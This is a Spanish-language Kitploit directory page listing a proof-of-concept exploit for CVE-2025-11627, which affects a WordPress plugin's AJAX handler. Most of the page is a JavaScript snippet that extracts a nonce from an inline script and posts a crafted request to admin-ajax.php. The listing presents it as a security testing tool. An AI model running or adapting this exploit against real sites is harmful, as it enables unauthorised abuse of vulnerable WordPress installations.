Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jfriedli/cve-2025-11627
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubjfriedli/cve-2025-11627

CVE-2025-11627

Exploit de prueba de concepto para CVE-2025-11627 dirigido a un manejador AJAX de plugin de WordPress con extracción de nonce y entrega de payload para pruebas de seguridad.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
CVE-2025-11627 — Exploit de prueba de concepto para CVE-2025-11627 dirigido a un manejador AJAX de plugin de WordPress con extracción de nonce y entrega de payload para pruebas de seguridad. | Kitploit

Envía una solicitud manipulada al manejador AJAX con el nonce extraído.

root@kitploit:~
(() => {
  // 1) find the inline script that contains the AJAX URL
  const s = [...document.scripts].find(sc => sc.textContent.includes('bill_minozzi_js_error_catched'));
  if (!s) { console.error('Script with ajax URL not found. Is wp_head() present?'); return; }

  // 2) extract the nonce from "...admin-ajax.php?action=bill_minozzi_js_error_catched&_wpnonce=XXXX"
  const m = s.textContent.match(/admin-ajax\.php\?action=bill_minozzi_js_error_catched&_wpnonce=([A-Za-z0-9_-]+)/);
  if (!m) { console.error('Nonce not found in inline script'); return; }
  const NONCE = m[1];

  // 3) send a minimal payload (safe proof)
  fetch('/wordpress/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {'Content-Type':'application/x-www-form-urlencoded'},
    body:
      'action=bill_minozzi_js_error_catched' +
      '&_wpnonce=' + encodeURIComponent(NONCE) +
      '&bill_js_error_catched=' + encodeURIComponent('Message: X - URL: http://x.js - Line: 1')
  }).then(r => r.text()).then(t => console.log('Response:', t));
})();
Descargar herramienta